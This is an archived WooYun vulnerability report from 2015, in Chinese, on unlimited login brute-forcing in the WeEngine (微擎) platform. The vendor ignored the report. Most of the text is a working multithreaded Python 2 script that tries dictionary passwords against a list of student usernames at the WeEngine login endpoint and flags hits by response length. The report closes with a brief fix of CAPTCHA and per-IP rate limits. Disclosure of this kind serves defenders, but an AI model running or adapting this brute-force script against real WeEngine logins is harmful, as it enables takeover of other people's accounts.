乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-07: 厂商已经主动忽略漏洞,细节向公众公开
微擎登陆页面可无限次暴力破解
利用代码
# -*- coding: latin-1 -*-import urllib2import urllibimport httplibimport cookielibimport threadingimport sysdef openfile(path): fp=open(path) files = [] for password in fp.readlines(): files.append(password.replace('\n','')) fp.close() return filesdef sendinfo(username,password): try: data = urllib.urlencode({"username":username,"password":password,"submit":"%E7%99%BB%E5%BD%95","token":"9139c24b"})#token值抓包,估计会变 headers = {"Content-type": "application/x-www-form-urlencoded" , "Accept": "text/plain"} httpClient = httplib.HTTPConnection("localhost", 80, timeout=30) httpClient.request("POST", "/weixin/web/index.php?c=user&a=login&", data, headers) response = httpClient.getresponse() if len(response.read()) > 3700: print "<mi> "+username+":"+password+"<ma>" except Exception,e: print e finally: if httpClient: httpClient.close()def check(username,passwords): for password in passwords: sys.stdout.write("Username: %s PassWord: %s \r" % (username,password)) sys.stdout.flush() sendinfo(username,password)if __name__ == '__main__': passwords=openfile("pass.dic")#字典 username = openfile("username.txt")#学生用户名 threads = [] for user in username: threads.append(threading.Thread(target=check,args=(user,passwords))) for t in threads: t.start() t.join() print "all is over"
加验证码和IP访问的次数
危害等级:无影响厂商忽略
忽略时间:2015-09-07 09:32
暂无